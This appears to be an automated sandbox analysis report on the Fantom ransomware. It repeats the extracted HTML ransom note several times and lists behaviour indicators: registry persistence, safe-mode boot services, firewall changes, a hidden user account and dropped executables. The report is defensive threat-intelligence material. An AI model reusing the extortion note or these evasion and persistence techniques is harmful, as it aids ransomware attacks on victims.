fantom | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Extracted

Path

C:\Program Files\7-Zip\Lang\DECRYPT_YOUR_FILES.HTML

Ransom Note

<html> <head> <style> body{ background-color: #3366CC; } h1 { background-color: RGB(249, 201, 16); } p { background-color: maroon; color: white; } </style> </head> <body> <center> <h1><b> Attention ! All your files </b> have been encrypted. </h1></br> <p> Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br> That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br> Getting a decryption of your files is - SIMPLY task.</br></br> That all what you need:</br> 1. Sent Your ID_KEY on mailbox [email protected] or [email protected] </br> 2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br> 3. Pay our services. </br> 4. GET software with passwords for decrypt you files.</br> 5. Make measures to prevent this type situations again.</br></br> IMPORTANT(1)</br> Do not try restore files without our help, this is useless, and can destroy you data permanetly.</br></br> IMPORTANT(2) </br> We Cant hold you decryption passwords forever. </br>ALL DECRYPTION PASSWORDS, for what wasn`t we receive reward, will destroy after week of moment of encryption. </p> <p> Your ID_KEY: <br> </p> <table width="1024" border="0"> <tbody> <tr> <td><p>ebr0/L/FKAWP/9ZNqnof8UOnGC/H8DZ5loUeffGsBEsxiQf7V0bOdZLLdY8fKQPDocEnErweO8xrXlqoixoqE1gDPpEPu1/d2655Px+sKaOktO79ry4IW+uCpGdmB/HJaW6oGVscdT3xVXgmJoSM5LpmFYUnXYoGdNmX82jO3zUCcv+rvBN/H/oLKFqxbbhxW7IONd26JAzj/JFSZ5yQTh5wEgFwY8h9vX45u5HpdIEbEJY3ugs7hQPCVJVAzn/aTjORBRapZMvvv3f7CpB1/8MzGM98AM4MsUIWgQcXlRM5OIV1xs8GEtqyi3orBtqDhoYPOlPhIO42UxufFieGdQ==ZW4tVVM=</p></td> </tr> </tbody> </table> </center></html></body>

Emails

Extracted

Path

C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML

Ransom Note

<html> <head> <style> body{ background-color: #3366CC; } h1 { background-color: RGB(249, 201, 16); } p { background-color: maroon; color: white; } </style> </head> <body> <center> <h1><b> Attention ! All your files </b> have been encrypted. </h1></br> <p> Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br> That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br> Getting a decryption of your files is - SIMPLY task.</br></br> That all what you need:</br> 1. Sent Your ID_KEY on mailbox [email protected] or [email protected] </br> 2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br> 3. Pay our services. </br> 4. GET software with passwords for decrypt you files.</br> 5. Make measures to prevent this type situations again.</br></br> IMPORTANT(1)</br> Do not try restore files without our help, this is useless, and can destroy you data permanetly.</br></br> IMPORTANT(2) </br> We Cant hold you decryption passwords forever. </br>ALL DECRYPTION PASSWORDS, for what wasn`t we receive reward, will destroy after week of moment of encryption. </p> <p> Your ID_KEY: <br> </p> <table width="1024" border="0"> <tbody> <tr> <td><p>lN8AIFde0sy3h769l5jJil0JskIH05UphYpnmANZW9378U0HhwEsB78RopkSXN5Sjc8JUVA071uBmTIpf5eq+CfiTODFRaIi+hodbvoKo3efSJAeprPe37DqoB74kDZiP3NGcZ0ipNyIOlfsoQg2qTwO3WrgL/ptPqG1PJqEPu9WoXXftA/coQ9dWBhZ56FZnyi898pnDLJVk4PtIbTwsU53DM1NKL7dIWJSo0Zuert6ugVmmkAxbzhAcgm3i4JSdHRj04qZ61EhwK1FdfKusOMrmqciGmEyUoK1Pd5lOUEnJNOjzghVdfzw5r/81YGtkVkTGK00nKfX7pq3na/EIA==ZW4tVVM=</p></td> </tr> </tbody> </table> </center></html></body>

Emails

Extracted

Path

C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML

Ransom Note

<html> <head> <style> body{ background-color: #3366CC; } h1 { background-color: RGB(249, 201, 16); } p { background-color: maroon; color: white; } </style> </head> <body> <center> <h1><b> Attention ! All your files </b> have been encrypted. </h1></br> <p> Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br> That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br> Getting a decryption of your files is - SIMPLY task.</br></br> That all what you need:</br> 1. Sent Your ID_KEY on mailbox [email protected] or [email protected] </br> 2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br> 3. Pay our services. </br> 4. GET software with passwords for decrypt you files.</br> 5. Make measures to prevent this type situations again.</br></br> IMPORTANT(1)</br> Do not try restore files without our help, this is useless, and can destroy you data permanetly.</br></br> IMPORTANT(2) </br> We Cant hold you decryption passwords forever. </br>ALL DECRYPTION PASSWORDS, for what wasn`t we receive reward, will destroy after week of moment of encryption. </p> <p> Your ID_KEY: <br> </p> <table width="1024" border="0"> <tbody> <tr> <td><p>R5+8qTevhmycSqSanzeCvKvcIyvhHm1y4NyFgUi5jxRHqMBDNUaUJUMAgh4djBdSZ5XFG3y6bCDnS5SEp5zABhF10NDXXeuvtDjmokGjqlJEPmh4Gig5SizlwyTvCEAdThkFxEq3lM8/brtn8raCeXLNGfReC94BfdAUuhzEdrilkT428mmSfJgkPhJYf8++gXLb1T48HjxxuzcLSjP5YJIR+jnkUyhDLzU30Qh9CRyQfDJr/fuGZj2tReq5mj4i+JQwzbkU9yb4/eFy931WVUVmvnLhN1FYs+E+OHEQVG0BrNsxMQ2fHiVVq5t+8YG9nAVZ2pFa1Gfq2WcwZWL0sg==ZW4tVVM=</p></td> </tr> </tbody> </table> </center></html></body>

Emails

Extracted

Path

C:\$Recycle.Bin\DECRYPT_YOUR_FILES.HTML

Ransom Note

<html> <head> <style> body{ background-color: #3366CC; } h1 { background-color: RGB(249, 201, 16); } p { background-color: maroon; color: white; } </style> </head> <body> <center> <h1><b> Attention ! All your files </b> have been encrypted. </h1></br> <p> Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br> That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br> Getting a decryption of your files is - SIMPLY task.</br></br> That all what you need:</br> 1. Sent Your ID_KEY on mailbox [email protected] or [email protected] </br> 2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br> 3. Pay our services. </br> 4. GET software with passwords for decrypt you files.</br> 5. Make measures to prevent this type situations again.</br></br> IMPORTANT(1)</br> Do not try restore files without our help, this is useless, and can destroy you data permanetly.</br></br> IMPORTANT(2) </br> We Cant hold you decryption passwords forever. </br>ALL DECRYPTION PASSWORDS, for what wasn`t we receive reward, will destroy after week of moment of encryption. </p> <p> Your ID_KEY: <br> </p> <table width="1024" border="0"> <tbody> <tr> <td><p>LH5q4XSJNDp3EuD1S3VPqChAzykNvepfdFqg33G/u+S3HjjvY1+CLtpmAECY4VIF/dCDCYyjoPnlPI9tQztbkdATF3mjmcXKP+cHdyJVkNyDLGXmWTg3SxUIj8S/bYVqCVnsiuTvx9GNaKm+XgKjkDVZ1CBxsoxZmEJy20UR2lv4HEZ6f+0R7Cdh07m64fAK3+s/PW+pOVpMLhe91dQ5EWLacsv7FaOwwY2iY9CK+CpG8iuR3awp/pMkiCL26/7bpgZHkN+rppNou1jw0YDTUF8fsthow+KxCt/M5+zNqYWIhoLcnV+qLipeLJEJGGeE+sHiuYTMu3oWgvq+GN0D7A==ZW4tVVM=</p></td> </tr> </tbody> </table> </center></html></body>

Emails

Extracted

Path

C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML

Ransom Note

<html> <head> <style> body{ background-color: #3366CC; } h1 { background-color: RGB(249, 201, 16); } p { background-color: maroon; color: white; } </style> </head> <body> <center> <h1><b> Attention ! All your files </b> have been encrypted. </h1></br> <p> Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br> That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br> Getting a decryption of your files is - SIMPLY task.</br></br> That all what you need:</br> 1. Sent Your ID_KEY on mailbox [email protected] or [email protected] </br> 2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br> 3. Pay our services. </br> 4. GET software with passwords for decrypt you files.</br> 5. Make measures to prevent this type situations again.</br></br> IMPORTANT(1)</br> Do not try restore files without our help, this is useless, and can destroy you data permanetly.</br></br> IMPORTANT(2) </br> We Cant hold you decryption passwords forever. </br>ALL DECRYPTION PASSWORDS, for what wasn`t we receive reward, will destroy after week of moment of encryption. </p> <p> Your ID_KEY: <br> </p> <table width="1024" border="0"> <tbody> <tr> <td><p>cF7XKH3l3ncC+4J91cA0oamZmWEzbPKt7kAF0/UYQ+GNcN8xW629+OEiueJ4W+sivzPoiFS9b2CiMWkl0U2vN69k6WJnIirvLb2QOWp5mmGi5WjWdVemwiiz/Zxymlb1buLzMrDN6MK+Y5GJLzt24pyI+0ANJb0NUfptrGXV9rH0dmkELJqXdvh+l4daMEzyMVip0Pug/1iKn5KMNSpMajpZ8exmLOAYBfQjjdg4NgFvhaH2fXIqRTD+c/xhzzoHZE0ig0HyiN6fgfWSI2Vr1JsePgmNOf41iCH4/fSyxWIfAGhegXcTZdMUikpk0v08jZdMvFNzrb1ckEx/V/D6JA==ZW4tVVM=</p></td> </tr> </tbody> </table> </center></html></body>

Emails

Extracted

Path

C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML

Ransom Note

<html> <head> <style> body{ background-color: #3366CC; } h1 { background-color: RGB(249, 201, 16); } p { background-color: maroon; color: white; } </style> </head> <body> <center> <h1><b> Attention ! All your files </b> have been encrypted. </h1></br> <p> Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br> That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br> Getting a decryption of your files is - SIMPLY task.</br></br> That all what you need:</br> 1. Sent Your ID_KEY on mailbox [email protected] or [email protected] </br> 2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br> 3. Pay our services. </br> 4. GET software with passwords for decrypt you files.</br> 5. Make measures to prevent this type situations again.</br></br> IMPORTANT(1)</br> Do not try restore files without our help, this is useless, and can destroy you data permanetly.</br></br> IMPORTANT(2) </br> We Cant hold you decryption passwords forever. </br>ALL DECRYPTION PASSWORDS, for what wasn`t we receive reward, will destroy after week of moment of encryption. </p> <p> Your ID_KEY: <br> </p> <table width="1024" border="0"> <tbody> <tr> <td><p>hwpUrFeyL7/NtNasQdtRqH1ye/9rymWWBn/dxdoc+XidiD1zGa/cC02zpi3q3aF6legsFIr33PVn/dmA5mOUrx7NkTHYI9vTsaIyTTc+5NozKdrHdGbEdXVCw2GCKPxB9dlYC04IAlQb1Y2wk0e3+dmc8OkKiD0TX9dwoj6AQH6IsDcFaIpwRVu9Qh8IA8Rs5uUF3ZOK7WaioK6N03wHj4/c17GADOJUFPBUkEvdrA+D/C9YFVprhfsGsO9CYM4MYfDQcTVulARHfC1iF0AKB2QtPO8rq5VsMP0zjjCtPFx3U8GsNBOcxpq2POC4swaM6t7ATgK8hTvOBXPcjYqyqA==ZW4tVVM=</p></td> </tr> </tbody> </table> </center></html></body>

Emails

Extracted

Path

C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML

Ransom Note

<html> <head> <style> body{ background-color: #3366CC; } h1 { background-color: RGB(249, 201, 16); } p { background-color: maroon; color: white; } </style> </head> <body> <center> <h1><b> Attention ! All your files </b> have been encrypted. </h1></br> <p> Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br> That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br> Getting a decryption of your files is - SIMPLY task.</br></br> That all what you need:</br> 1. Sent Your ID_KEY on mailbox [email protected] or [email protected] </br> 2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br> 3. Pay our services. </br> 4. GET software with passwords for decrypt you files.</br> 5. Make measures to prevent this type situations again.</br></br> IMPORTANT(1)</br> Do not try restore files without our help, this is useless, and can destroy you data permanetly.</br></br> IMPORTANT(2) </br> We Cant hold you decryption passwords forever. </br>ALL DECRYPTION PASSWORDS, for what wasn`t we receive reward, will destroy after week of moment of encryption. </p> <p> Your ID_KEY: <br> </p> <table width="1024" border="0"> <tbody> <tr> <td><p>R4k9IPs6Jm1yl0d83AYtXa6ogO8dom69bU2nGwf0veaA+FR9pHxwhg/dbmbwaIjLuCCqzWG/Y9LUkZsh0rmeMFpy4MG21rdqB85fdRQS6rhGvaWq+GyBwJ9//Gxk0IVh/2wp03we7EYZzQLKl97w6/20Mz9hQGuOHR/LKJ1ZovGgHpGEFJKc241bMG8JgV3psIssRh7ymgvnrGr69pPTW20/vArDXmcw9Vvsqp/Cp+F+1FgvkKSVpOZ8kt5XkVZQRedI5R1+Qo/EU4r1oqjBJVtIrwUCOG5Yi/dpNH9TBZOAqP6S5FyW88c96cXvLa2VkRoBnnE+ZaxXkKnPZNfBig==ZW4tVVM=</p></td> </tr> </tbody> </table> </center></html></body>

Emails

Extracted

Path

C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML

Ransom Note

<html> <head> <style> body{ background-color: #3366CC; } h1 { background-color: RGB(249, 201, 16); } p { background-color: maroon; color: white; } </style> </head> <body> <center> <h1><b> Attention ! All your files </b> have been encrypted. </h1></br> <p> Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br> That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br> Getting a decryption of your files is - SIMPLY task.</br></br> That all what you need:</br> 1. Sent Your ID_KEY on mailbox [email protected] or [email protected] </br> 2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br> 3. Pay our services. </br> 4. GET software with passwords for decrypt you files.</br> 5. Make measures to prevent this type situations again.</br></br> IMPORTANT(1)</br> Do not try restore files without our help, this is useless, and can destroy you data permanetly.</br></br> IMPORTANT(2) </br> We Cant hold you decryption passwords forever. </br>ALL DECRYPTION PASSWORDS, for what wasn`t we receive reward, will destroy after week of moment of encryption. </p> <p> Your ID_KEY: <br> </p> <table width="1024" border="0"> <tbody> <tr> <td><p>m5ID8l13iN4uNMSt3rYYaajWLBLhIbemO06K0BE/hRcW1QA+LrnGLEH5eTBupQf4oWxfwhWzwCtyL0c+Qqx1Xd/9BTzhQGkCisI1C8IdB3bFFlkrYZm49rLS654W488lKhTi7v58w6u5Xl+O/2fIb8jgCrzPdRCsHYJZEGott6hU1MEJagNB/gW1UE/3p07r1OoLKl4TRDouUtanu9lHS4pmlRkd8mfYoN6uUD+jBu11iB5xXweFqluTluL1H95rfmC+Jl5tRdbs1pI5WA0yWVQaef03nJErT9LQcZvQ+QGofzQ06vYjZuNskZTobICrDo1a9ln4bbcXb3h+QJZ8lQ==ZW4tVVM=</p></td> </tr> </tbody> </table> </center></html></body>

Emails

Extracted

Path

C:\Program Files\7-Zip\DECRYPT_YOUR_FILES.HTML

Ransom Note

<html> <head> <style> body{ background-color: #3366CC; } h1 { background-color: RGB(249, 201, 16); } p { background-color: maroon; color: white; } </style> </head> <body> <center> <h1><b> Attention ! All your files </b> have been encrypted. </h1></br> <p> Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br> That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br> Getting a decryption of your files is - SIMPLY task.</br></br> That all what you need:</br> 1. Sent Your ID_KEY on mailbox [email protected] or [email protected] </br> 2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br> 3. Pay our services. </br> 4. GET software with passwords for decrypt you files.</br> 5. Make measures to prevent this type situations again.</br></br> IMPORTANT(1)</br> Do not try restore files without our help, this is useless, and can destroy you data permanetly.</br></br> IMPORTANT(2) </br> We Cant hold you decryption passwords forever. </br>ALL DECRYPTION PASSWORDS, for what wasn`t we receive reward, will destroy after week of moment of encryption. </p> <p> Your ID_KEY: <br> </p> <table width="1024" border="0"> <tbody> <tr> <td><p>f/XUsiXBHFHFUMYX8A8bTtbKJ0CfykQv7G6NCjyaaucC8be4VOTQqkv+86txMF7I+I4+bFgeZoGVOE1euvvvpHLRKteAyVdrbquOICWAfatJvnEdEBl9Oyn0rX2hhevuTxo188pW8mgbs4T6WVNcsaVZohAzfzP+KLwwx6Bx32rj7ulyq2Yc+8DF1sxhzl2i40IvKQwUxJrVzNfKmsAFcIfSsPipUwYEjxJqwTCjcq0dXbFQGmvRLLHxzp1tEE9QWbHKtDN6sHFKYy+HycJrYqytlGNpYOyaeDZ5JSih33xhvwZ8SpEVhy90W5037eM/zSHwlyDS4hSxXoHnoZNM3w==ZW4tVVM=</p></td> </tr> </tbody> </table> </center></html></body>

Emails

Signatures

Fantom
Ransomware which hides encryption process behind fake Windows Update screen.
ransomware fantom
Fantom family
fantom
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
3100	net.exe
4388	net1.exe

Renames multiple (159) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4548	netsh.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
5388	attrib.exe

Sets service image path in registry 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\gfwzcxvawuujgazo\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\gfwzcxvawuujgazo.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\saeexgimvlfstdguz\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\saeexgimvlfstdguz.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\tvhancemgjyrxfq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\tvhancemgjyrxfq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\vzeyubktwqevus\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\vzeyubktwqevus.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\fpoeidqgfaiasixb\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\fpoeidqgfaiasixb.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\qtozzxugfzocmzwn\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\qtozzxugfzocmzwn.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zcrbyzmgjqbzxkhdc\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\zcrbyzmgjqbzxkhdc.sys"	mssql.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Dharma.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Fantom.exe

Executes dropped EXE 17 IoCs

pid	Process
1804	Fantom.exe
5508	Fantom.exe
6036	Fantom.exe
744	Fantom.exe
5824	Fantom.exe
5188	Fantom.exe
5688	Fantom.exe
5124	Fantom.exe
5624	Fantom.exe
5988	Fantom.exe
5832	Fantom.exe
5864	Dharma.exe
1388	nc123.exe
2332	mssql.exe
1292	mssql2.exe
5496	SearchHost.exe
4124	WindowsUpdate.exe

Impair Defenses: Safe Mode Boot 1 TTPs 14 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\FPOEIDQGFAIASIXB.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\qtozzxugfzocmzwn.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\QTOZZXUGFZOCMZWN.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\VZEYUBKTWQEVUS.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\gfwzcxvawuujgazo.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\saeexgimvlfstdguz.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\TVHANCEMGJYRXFQ.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\GFWZCXVAWUUJGAZO.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\tvhancemgjyrxfq.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\fpoeidqgfaiasixb.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vzeyubktwqevus.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\SAEEXGIMVLFSTDGUZ.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\zcrbyzmgjqbzxkhdc.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\ZCRBYZMGJQBZXKHDC.SYS	mssql.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\D:	SearchHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
62	raw.githubusercontent.com
63	raw.githubusercontent.com

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_ca.xml	Fantom.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\Stationery\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\ClientEventLogMessages.man	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Triedit\en-US\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fr-FR\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ipsen.xml	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\ja-jp-sym.xml	Fantom.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\en-US\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\da-DK\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\TextConv\en-US\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\System\ja-JP\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\symbase.xml	Fantom.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ta.txt	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base.xml	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\baseAltGr_rtl.xml	Fantom.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\de-DE\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\oskmenubase.xml	Fantom.exe
File opened for modification	C:\Program Files\Common Files\System\ado\en-US\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\ClientEventLogMessages.man	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ro-RO\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\zh-TW\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ipstr.xml	Fantom.exe
File created	C:\Program Files\7-Zip\Lang\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\ClientCapabilities.json	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ru-RU\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\OFFICE16\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\he-IL\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lt.txt	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main.xml	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\lv-LV\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\dotnet\host\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ko-KR\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad.xml	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ipssrb.xml	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ipsnld.xml	Fantom.exe
File opened for modification	C:\Program Files\Common Files\System\ado\it-IT\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ipshrv.xml	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ipsrom.xml	Fantom.exe
File opened for modification	C:\Program Files\NewComplete.dotm	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\kor-kor.xml	Fantom.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ipsfra.xml	Fantom.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt	Fantom.exe
